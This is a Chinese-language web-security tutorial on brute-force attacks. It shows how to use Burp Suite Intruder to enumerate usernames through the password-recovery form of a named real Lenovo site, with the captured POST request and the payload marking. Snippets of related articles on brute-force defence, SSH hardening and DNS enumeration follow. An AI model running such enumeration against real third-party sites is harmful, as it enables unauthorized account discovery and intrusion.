暴力破解攻击

接下来,单独讲一下暴力破解,这个在渗透测试的时候,也是非常重要的入侵手段。

在此,我只讲一下关于web方面的暴力破解,其他如:主机,防火墙,数据库等等的暴力破解,就不讲了,大家可以自行百度,自行学习,一定得养成独立自学的习惯,遇到问题,再去解决,即,带着疑问去找答案,而不是填鸭式的学一些东西,其实,这算是王爽老师的话,分享给大家。

burpsuite-intruder介绍

大家可以自学我一位朋友的关于burpsuite的系列教程,百度:angelc0de,你就会找到他。

burpsuite-Intruder:一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。

虽然说的比较复杂,但是,我们只学习他的暴力破解功能,其他不管。

例1, 联想prccn站取回密码处,暴力猜解该站用户名,如图:

猜解前提:

1、 无验证码或者验证码可绕过

2、 未限制错误次数

恰好,这里同时满足这两个条件。

输入用户名:1111111

使用burpsuite截获请求包

POST /ReturnPassword.aspx HTTP/1.1

Host: prccn.lenovo.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 256

__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=1111111&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81

接着,Ctrl+i,将该intercept下面的数据包复制到intruder下面,如图:

此时,intruder下就有与intercept下同样的一份数据包了

现在,我们来clear掉所有褐色,然后,使用add将该txtUserName=1111111键值对标上助记符,最后,加载wordlist字典让intruder来为我们进行暴力猜解该用户名。

如图所示:

POST /ReturnPassword.aspx HTTP/1.1

Host: prccn.lenovo.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 256

__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=§1111111§&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81

看到了吗,我们要猜解的用户名1111111,已经被$助记符标记上了。

接下来,加载我们的worldlist用户名字典,如图:

Playloads标签下面,选择Playload type,选择Runtime file,选择Select file,最后,选择我们的worldlist用户名字典

字典加载完成后,在菜单栏找到intruder标签,选择Start attack,intruder就开始为我们暴力猜解了。

如图所示:

几分钟后,intruder猜解完成

嘿嘿,看下Length字段,是否有别具一格的数据包长度。

Length=2482(目测是猜解成功的用户名)

试试呗,输入:aaa

看来不是,继续查看其他长度的数据包

输入:alex试试

还是错误,算了,不试了,其实,还有更精确的查找法,可以看看angelc0de的系列教程,在此,不再赘述。

时间: 2024-08-04 10:02:35

暴力破解攻击的相关文章

【运维小分享】记个人博客网站受针对xmlrpc.php的暴力破解攻击

起因: 今天忽然打开个人blog,就发现打开很慢,然后出现了下图的反馈:服务器服务不可用!waht?刷新了几次都不行,赶紧登陆服务器后台查看情况. 确认攻击: 登陆后台后通过netstat发现连接数极多,相对于平时来说多了好几倍吧,赶紧通过日志load出疯狂访问的ip # cat 2016-12-16-access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -n 10   30305 191.96.249.53   290

Wireshark黑客发现之旅(4)——暴力破解

Wireshark黑客发现之旅(4)——暴力破解 聚锋实验室 · 2015/08/10 10:33 作者:Mr.Right.K0r4dji 申明:文中提到的攻击方式仅为曝光.打击恶意网络攻击行为,切勿模仿,否则后果自负. 一.个人观点 暴力破解,即用暴力穷举的方式大量尝试性地猜破密码.猜破密码一般有3种方式: 1.排列组合式:首先列出密码组合的可能性,如数字.大写字母.小写字母.特殊字符等:按密码长度从1位.2位……逐渐猜试.当然这种方法需要高性能的破解算法和CPU/GPU做支持. 2.字典破解

云平台数据库安全系列之(一)暴力破解

各行业的企业.个人.开发者希望以低成本的方式实现IT运维外包,通过互联网云服务器实现快速数据分享,充分享受云计算带来的便利,这正是云的魅力所在. 对于快速增长的云应用,在享受随时.随地.随需的高效云服务的同时,企业和个人用户同样面临一个不容忽视的问题:企业重要数据和个人隐私数据保存在云平台的数据库中,如果这些数据资产丢失将会造成巨大损失. 一.云平台下暴力破解攻击现状 暴力破解攻击是云用户面临的最主要威胁之一,以某云平台防护的日常安全运营记录为例,每周黑客对云租户的暴力破解数量高达数亿次.下图是

防止WordPress利用xmlrpc.php进行暴力破解以及DDoS

早在2012 年 12 月 17 日一些采用 PHP 的知名博客程序 WordPress被曝光存在严重的漏洞,该漏洞覆盖WordPress 全部已发布的版本(包括WordPress 3.8.1).该漏洞的 WordPress 扫描工具也在很多论坛和网站发布出来.工具可以利用 WordPress 漏洞来进行扫描,也可以发起DDoS 攻击.经过测试,漏洞影响存在 xmlrpc.php 文件的全部版本. 最近我也遇到了大规模的wordpress后台(wp-login.php)爆破,wordpress差

htpwdScan — 一个简单的HTTP暴力破解、撞库攻击脚本

李姐姐之前跟我们分享了子域名枚举工具subDomainBrute<subDomainsBrute — 改进渗透测试时暴力枚举子域名的python脚本>,这回带给我们htpwdScan htpwdScan 是一个简单的HTTP暴力破解.撞库攻击脚本: 1. 支持批量校验并导入HTTP代理,低频撞库可以成功攻击大部分网站,绕过大部分防御策略和waf2. 支持直接导入互联网上泄露的社工库,发起撞库攻击3. 支持导入超大字典4. 其他细微功能:随机X-Forwarded-For.随机SessionID

DVWA系列の命令注入&amp;暴力破解

Brute Force(暴力测试): 对比难度为Low和high的代码可以发现 相对于Low,High在用户名和密码处分别加了两个过滤函数 Stripslashes: 输入:字符串. 输出:返回一个去除转义反斜线后的字符串(\' 转换为 ' 等等).双反斜线(\\)被转换为单个反斜线(\). mysql_real_escape_string:以下字符前添加反斜杠: \x00, \n, \r, \, ', " 和 \x1a. 代码是用来防止sql注入代码,对暴力破解这一项并没有影响,只不过上面爆破

linux防止ssh远程暴力破解的方法和fail2ban软件的配置应用

一.修改参数来使得暴力破解变得几乎不可能 1.密码设定要足够复杂 密码的设定,尽可能要有大写字母.小写字母.特殊符号和数字,长度至少要大于8,当然越长越好,只要能记住. 2.修改默认端口号 修改sshd服务的默认端口号,可以进一步防止黑客的恶意攻击.首先介绍一个工具:nmap:nmap可以探测某个服务器的远程端口号开放列表; #nmap 192.168.1.163 StartingNmap 5.51 ( http://nmap.org ) at 2015-11-10 14:43 CST Nmap

Linux VPS 安全配置:禁用22端口、root用户以及配置Denyhosts防暴力破解

最近租用了一台Vultr东京机房的VPS,每天都会生成许多异常登录失败的日志,疑似受到扫描软件的暴力破解,遂Google了一下服务器安全防护方面的知识. 废话不多说,下面将操作过程记录下来: 注意:以下操作基于CentOS 7,不同系统下的具体操作可能会有区别 一.修改SSH服务默认端口 SSH服务的默认端口是22,扫描软件首先会通过此端口尝试登录,因此把它改成一个不易猜到的端口(推荐使用10000~65535之间的,复杂度最高也不易和其他进程发生冲突) 1 vim /etc/ssh/sshd_

渗透测试之DNS暴力破解fierce教程

1. 介绍 在一个安全的环境中,暴力破解DNS的方式是一种获取不连续IP地址空间主机的有效手段.fierce工具可以满足这样的需求,而且已经预装在Kali Linux中.fierce是RSnake创立的快速有效地DNS暴力破解工具.fierce工具首先域名的IP地址,查询相关的域名服务器,然后利用字典进行攻击. 2. 用法 在Kali Linux中建立一个终端回话,输入下列命名查看帮助: # fierce -h fierce最基本的用法如下,以blog.csdn.net(只做测试,别无它用)为例